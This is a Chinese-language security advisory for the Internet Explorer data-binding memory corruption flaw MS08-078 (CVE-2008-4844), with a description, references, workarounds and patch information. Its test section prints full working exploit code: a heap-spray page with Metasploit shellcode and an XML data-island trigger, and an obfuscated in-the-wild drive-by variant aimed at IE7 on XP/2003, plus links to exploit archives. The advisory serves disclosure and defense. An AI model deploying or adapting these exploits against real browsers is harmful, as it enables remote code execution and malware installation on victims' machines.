
安全研究

安全漏洞
Microsoft IE對象處理內存破壞漏洞(MS08-078)

發布日期:2008-12-07
更新日期:2008-12-10

受影響系統:
Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.01
描述:
BUGTRAQ  ID: 32721
CVE(CAN) ID: CVE-2008-4844

Internet Explorer是微軟公司開發的廣為流行的網絡瀏覽器。

Internet Explorer的數據綁定函數中存在無效指針引用,可導致遠程代碼執行。如果啟用了數據綁定(默認狀態),在某些情況下對象會在數組長度未相應更新的情況下被釋放,之後仍可訪問該已釋放對象的內存空間,導致Internet Explorer以可被利用的狀態退出。
    
攻擊者可以通過構造特製網頁並誘使用戶查看來利用這個漏洞;用戶查看該網頁時可能導致遠程代碼執行。成功利用此漏洞的攻擊者可以獲得與當前登錄用戶相同的權限。

此漏洞目前正被掛馬攻擊積極利用,用於向用戶系統植入惡意軟件。

<*鏈接:http://www.scanw.com/blog/archives/303
        http://www.microsoft.com/technet/security/advisory/961051.mspx
        http://secunia.com/advisories/33089/
        http://www.avertlabs.com/research/blog/index.php/2008/12/09/yet-another-unpatched-drive-by-exploit-found-on-the-web/
        http://research.eeye.com/html/alerts/zeroday/20081209.html
        http://www.microsoft.com/technet/security/Bulletin/MS08-078.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA08-352A.html
*>

測試方法:

警 告

以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!

<html>
<script>

    // k`sOSe 12/10/2008
    // Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
    // Heap spray address adjusted for Vista - muts / offensive-security.com
    // http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
    // http://www.offensive-security.com/0day/iesploit-vista.rar
    // windows/exec - 141 bytes
    // http://www.metasploit.com                                                                    
    // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe    
    var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
      var block = unescape("%u0c0c%u0c0c");
    var nops = unescape("%u9090%u9090%u9090");


    while (block.length < 81920) block += block;
    var memory = new Array();
    var i=0;
    for (;i<1000;i++) memory[i] += (block + nops + shellcode);

    document.write("<iframe src=\"iframe.html\">");

</script>


</html>


<!-- iframe.html

<XML ID=I>
    <X>
        <C>
            <![CDATA[
                <image
                    SRC=http://&#3084;&#3084;.xxxxx.org            
                >
             ]]>
            
        </C>
    </X>
</XML>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
    <XML ID=I>
    </XML>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
    </SPAN>
</SPAN>

-->



&lt;script language=&quot;javascript&quot;&gt;
if(navigator.userAgent.toLowerCase().indexOf(&quot;msie 7&quot;)==-1)location.replace(&quot;about:blank&quot;);

function sleep(milliseconds)
{
var start=new Date().getTime();

for(var i=0;i&lt;1e7;i++)
{if((new Date().getTime()-start)&gt;milliseconds)
{break}
}
}

function spray(sc)
{
var infect=unescape(sc.replace(/dadong/g,&quot;\x25\x75&quot;));
var heapBlockSize=0x100000;
var payLoadSize=infect.length*2;
var szlong=heapBlockSize-(payLoadSize+0x038);
var retVal=unescape(&quot;%u0a0a%u0a0a&quot;);
retVal=getSampleValue(retVal,szlong);
aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
zzchuck=new Array();
for(i=0;i&lt;aaablk;i++){zzchuck=retVal+infect}
}

function getSampleValue(retVal,szlong)
{
while(retVal.length*2&lt;szlong)
{retVal+=retVal}
retVal=retVal.substring(0,szlong/2);
return retVal
}

var a1=&quot;dadong&quot;;
spray(a1+&quot;9090&quot;+a1+&quot;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&quot;);

sleep(3000);

nav=navigator.userAgent.toLowerCase();
if(navigator.appVersion.indexOf(&#039;MSIE&#039;)!=-1)
{
version=parseFloat(navigator.appVersion.split(&#039;MSIE&#039;)[1])
}
if(version==7)
{
w2k3=((nav.indexOf(&#039;windows nt 5.2&#039;)!=-1)||(nav.indexOf(&#039;windows 2003&#039;)!=-1));
wxp=((nav.indexOf(&#039;windows nt 5.1&#039;)!=-1)||(nav.indexOf(&#039;windows xp&#039;)!=-1));
if(wxp||w2k3)document.write(&#039;&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;image SRC=http://r.r.book.com src=http://www.google.com]]&gt;&lt;![CDATA[&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;XML ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;&#039;);
var i=1;while(i&lt;=10)
{
window.status=&quot; &quot;;i++}
}
&lt;/script&gt;

http://milw0rm.com/sploits/2008-iesploit.tar.gz

建議:
臨時解決方法:

如果您不能立刻安裝補丁或升級,NSFOCUS建議您采取以下措施以降低風險:

* 將Internet Explorer配置為在Internet和本地Intranet安全區域中運行ActiveX控件之前進行提示。
* 將Internet和本地intranet安全區設置為“高”以在運行ActiveX控件和活動腳本之前要求提示。
* 禁用XML Island功能。
* 通過完整性級別ACL限制Internet Explorer使用OLEDB32.dll。
* 禁用OLEDB32.dll的Row Position功能。
* 注銷OLEDB32.DLL。
* 使用ACL禁用OLEDB32.DLL。
* 在Internet Explorer 8 Beta 2中禁用數據綁定支持。

廠商補丁:

Microsoft
---------
Microsoft已經為此發布了一個安全公告(MS08-078)以及相應補丁:
MS08-078:Security Update for Internet Explorer (960714)
鏈接:http://www.microsoft.com/technet/security/Bulletin/MS08-078.mspx?pf=true
